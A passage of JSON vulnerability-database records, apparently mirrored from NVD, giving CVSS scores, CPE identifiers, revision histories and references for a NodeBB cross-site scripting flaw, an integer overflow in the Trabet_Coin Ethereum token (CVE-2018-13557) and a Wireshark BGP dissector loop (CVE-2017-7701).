"references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}, {"id": "CVE-2018-13557", "bulletinFamily": "NVD", "title": "CVE-2018-13557", "description": "The mintToken function of a smart contract implementation for Trabet_Coin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "published": "2018-07-09T06:29:00", "modified": "2018-08-29T15:53:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13557", "reporter": "cve@mitre.org", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"], "cvelist": ["CVE-2018-13557"], "type": "cve", "lastseen": "2021-04-23T00:24:16", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "trabet_coin_project:trabet_coin", "name": "trabet coin project trabet coin", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:trabet_coin_project:trabet_coin:-"], "cpe23": ["cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2018-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for Trabet_Coin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:28:57", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:28:57", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "e6600185432eb4b5878e2e54e218471b4e560546bc0aaaf33442efb967747e57", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "da0723bb6c21f321951027677e62d28c", "key": "references"}, {"hash": "28c9f9eecd7a9ef6bc292fa4f0efe4b2", "key": "description"}, {"hash": "c358653109548d38cfc534357ee45fa7", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "85e2335ecc9ec10445fba4a7254a2d71", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7eeeba95d6d8920fa05fb97172e25bc8", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bf6a62ccf9aa8ba0d1cddaeef9f754cb", "key": "cvelist"}, {"hash": "589aa880f6109c1265d1b7a0147c2218", "key": "title"}, {"hash": "1ca4dfb3bf2d5ba7b215fab72a4d1ac6", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "41c1c39390c108966dec908d56cdb9e0", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13557", "id": "CVE-2018-13557", "lastseen": "2020-09-21T14:28:57", "modified": "2018-08-29T15:53:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"], "reporter": "cve@mitre.org", "title": "CVE-2018-13557", "type": "cve", "viewCount": 2}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:28:57"}, {"bulletin": {"affectedSoftware": [{"name": "trabet_coin_project trabet_coin", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:trabet_coin_project:trabet_coin:-"], "cpe23": ["cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*"], "cvelist": ["CVE-2018-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for Trabet_Coin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:19:46", "references": [], "rev": 2}, "score": {"modified": "2019-05-29T18:19:46", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "679c9fcd6b75a4df7950275e1985a51a451ec77d0de83951e5d0bc94c5d30a3f", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "083a921ea0ed72504ad0fa15e3e394ee", "key": "affectedSoftware"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "da0723bb6c21f321951027677e62d28c", "key": "references"}, {"hash": "28c9f9eecd7a9ef6bc292fa4f0efe4b2", "key": "description"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "85e2335ecc9ec10445fba4a7254a2d71", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7eeeba95d6d8920fa05fb97172e25bc8", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bf6a62ccf9aa8ba0d1cddaeef9f754cb", "key": "cvelist"}, {"hash": "589aa880f6109c1265d1b7a0147c2218", "key": "title"}, {"hash": "1ca4dfb3bf2d5ba7b215fab72a4d1ac6", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "41c1c39390c108966dec908d56cdb9e0", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13557", "id": "CVE-2018-13557", "lastseen": "2019-05-29T18:19:46", "modified": "2018-08-29T15:53:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"], "reporter": "cve@mitre.org", "title": "CVE-2018-13557", "type": "cve", "viewCount": 2}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:19:46"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "trabet_coin_project:trabet_coin", "name": "trabet coin project trabet coin", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:trabet_coin_project:trabet_coin:-"], "cpe23": ["cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for Trabet_Coin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:12", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:20:12", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [], "hash": "6df06ed76c4859c331286ee79e06a36943f2e5838877229d5848a0fc3b69649a", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "da0723bb6c21f321951027677e62d28c", "key": "references"}, {"hash": "28c9f9eecd7a9ef6bc292fa4f0efe4b2", "key": "description"}, {"hash": "c358653109548d38cfc534357ee45fa7", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "da25867ea3c9a9aea786e5245355f71e", "key": "cpeConfiguration"}, {"hash": "85e2335ecc9ec10445fba4a7254a2d71", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7eeeba95d6d8920fa05fb97172e25bc8", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bf6a62ccf9aa8ba0d1cddaeef9f754cb", "key": "cvelist"}, {"hash": "589aa880f6109c1265d1b7a0147c2218", "key": "title"}, {"hash": "1ca4dfb3bf2d5ba7b215fab72a4d1ac6", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "41c1c39390c108966dec908d56cdb9e0", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13557", "id": "CVE-2018-13557", "lastseen": "2020-10-03T13:20:12", "modified": "2018-08-29T15:53:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"], "reporter": "cve@mitre.org", "title": "CVE-2018-13557", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:20:12"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "trabet_coin_project:trabet_coin", "name": "trabet coin project trabet coin", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:trabet_coin_project:trabet_coin:-"], "cpe23": ["cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for Trabet_Coin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:28", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:52:28", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"}, {"name": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin"}], "hash": "a0e86a9669f010ed856da870941451f13780a25a4b50dd685221c12f6cb98ca4", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "fbd04923bc1e81a47b90d79d74354822", "key": "extraReferences"}, {"hash": "da0723bb6c21f321951027677e62d28c", "key": "references"}, {"hash": "28c9f9eecd7a9ef6bc292fa4f0efe4b2", "key": "description"}, {"hash": "c358653109548d38cfc534357ee45fa7", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "da25867ea3c9a9aea786e5245355f71e", "key": "cpeConfiguration"}, {"hash": "85e2335ecc9ec10445fba4a7254a2d71", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "7eeeba95d6d8920fa05fb97172e25bc8", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bf6a62ccf9aa8ba0d1cddaeef9f754cb", "key": "cvelist"}, {"hash": "589aa880f6109c1265d1b7a0147c2218", "key": "title"}, {"hash": "1ca4dfb3bf2d5ba7b215fab72a4d1ac6", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "41c1c39390c108966dec908d56cdb9e0", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13557", "id": "CVE-2018-13557", "immutableFields": [], "lastseen": "2021-02-02T06:52:28", "modified": "2018-08-29T15:53:00", "objectVersion": "1.5", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"], "reporter": "cve@mitre.org", "title": "CVE-2018-13557", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:52:28"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "c358653109548d38cfc534357ee45fa7"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "41c1c39390c108966dec908d56cdb9e0"}, {"key": "cpe23", "hash": "7eeeba95d6d8920fa05fb97172e25bc8"}, {"key": "cpeConfiguration", "hash": "88774b8884d3044114e267a17b58ff69"}, {"key": "cvelist", "hash": "bf6a62ccf9aa8ba0d1cddaeef9f754cb"}, {"key": "cvss", "hash": "b5bbdd851ff7634dd01c09e00d03be1e"}, {"key": "cvss2", "hash": "e2b44d17a049a159a684c7e2b843b3fa"}, {"key": "cvss3", "hash": "d45b77eee118ec6752891b06b2c37770"}, {"key": "cwe", "hash": "2ae76161d39c17aef8ca38b9bfc8fde3"}, {"key": "description", "hash": "28c9f9eecd7a9ef6bc292fa4f0efe4b2"}, {"key": "extraReferences", "hash": "fbd04923bc1e81a47b90d79d74354822"}, {"key": "href", "hash": "85e2335ecc9ec10445fba4a7254a2d71"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1ca4dfb3bf2d5ba7b215fab72a4d1ac6"}, {"key": "published", "hash": "78096afd2582092cbfa3bd530511d954"}, {"key": "references", "hash": "da0723bb6c21f321951027677e62d28c"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "589aa880f6109c1265d1b7a0147c2218"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "8b9815115c8072007428d3a5a888d0d8382d3e436d8fd4ed478ebf9e21df7776", "viewCount": 9, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:24:16", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2021-04-23T00:24:16", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:trabet_coin_project:trabet_coin:-"], "affectedSoftware": [{"cpeName": "trabet_coin_project:trabet_coin", "name": "trabet coin project trabet coin", "operator": "eq", "version": "-"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*"], "cwe": ["CWE-190"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:trabet_coin_project:trabet_coin:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"}, {"name": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Trabet_Coin"}], "immutableFields": []}, {"id": "CVE-2017-7701", "bulletinFamily": "NVD", "title": "CVE-2017-7701", "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "published": "2017-04-12T23:59:00", "modified": "2019-10-03T00:03:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "reporter": "cve@mitre.org", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "cvelist": ["CVE-2017-7701"], "type": "cve", "lastseen": "2021-04-23T00:08:04", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.7"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.9"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.8"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.11"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.6"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.10"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.4"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.4"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", 